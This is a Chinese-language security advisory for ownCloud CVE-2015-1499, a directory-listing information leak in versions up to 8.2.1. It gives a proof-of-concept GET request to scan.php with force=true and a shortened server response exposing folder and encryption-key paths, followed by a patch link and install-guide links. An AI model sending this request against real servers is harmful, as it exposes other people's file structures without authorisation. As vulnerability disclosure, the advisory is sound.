owncloud信息泄露漏洞(CVE-2015-1499)发布日期:2016-01-07
更新日期:2016-01-08
受影响系统:ownCloud ownCloud <= 8.2.1
ownCloud ownCloud <= 8.1.4
ownCloud ownCloud <= 8.0.9
描述:
CVE(CAN) ID: CVE-2015-1499
ownCloud是开源文件同步和共享解决方案。
owncloud <= 8.2.1, <= 8.1.4, <= 8.0.9版本的目录列表中存在信息泄露漏洞,此漏洞位于index.php/apps/files/ajax/scan.php的"force"参数中,通过设置该参数值为"true",可使攻击者获取完整目录结构及其所有文件信息。
<*来源:Adam Mariš
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Adam Mariš ()提供了如下测试方法:
GET /index.php/apps/files/ajax/scan.php?force=true&dir=&requesttoken=<VALIDREQUESTTOKEN> HTTP/1.1
Host: [HOST]
Accept: text/event-stream
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REFERER]
Cookie: [COOKIES]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Server response (shortened):
event: user
data: "[ID]"
event: folder
data: "/"
event: count
data: 21
event: count
data: 42
event: count
data: 63
event: folder
data: "/[ID]"
event: folder
data: "/[ID]/cache"
event: folder
data: "/[ID]6/files"
event: folder
data: "/[ID]/files_encryption"
[...]
event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].zip"
event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].zip/OC_DEFAULT_MODULE"
event: folder
data: "/[ID]/files_encryption/keys/files/[FILENAME].pptx"
[...]
建议:
厂商补丁:
ownCloud
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://owncloud.org/security/advisory/?id=oc-sa-2016-002CentOS7下Nginx+ownCloud+PHP+MySQL搭建个人私有云 http://www.linuxidc.com/Linux/2015-05/117086.htm在Ubuntu上安装OwnCloud 7.0.4 http://www.linuxidc.com/Linux/2015-01/111710.htmCentOS 6.3搭建个人私有云存储ownCloud http://www.linuxidc.com/Linux/2014-03/98757.htm在Ubuntu 12.04 LTS上安装ownCloud 4.0.6平台 http://www.linuxidc.com/Linux/2012-08/68297.htmCentOS 6.2下安装ownCloud 4.0图解 http://www.linuxidc.com/Linux/2013-03/80994.htmUbuntu 12.04下使用ownCloud搭建私人存储云 http://www.linuxidc.com/Linux/2013-08/89380.htmUbuntu/Debian/CentOS/Fedora/OpenSUSE 及衍生系统如何安装 OwnCloud 6 http://www.linuxidc.com/Linux/2014-06/102679.htm
易网时代-编程资源站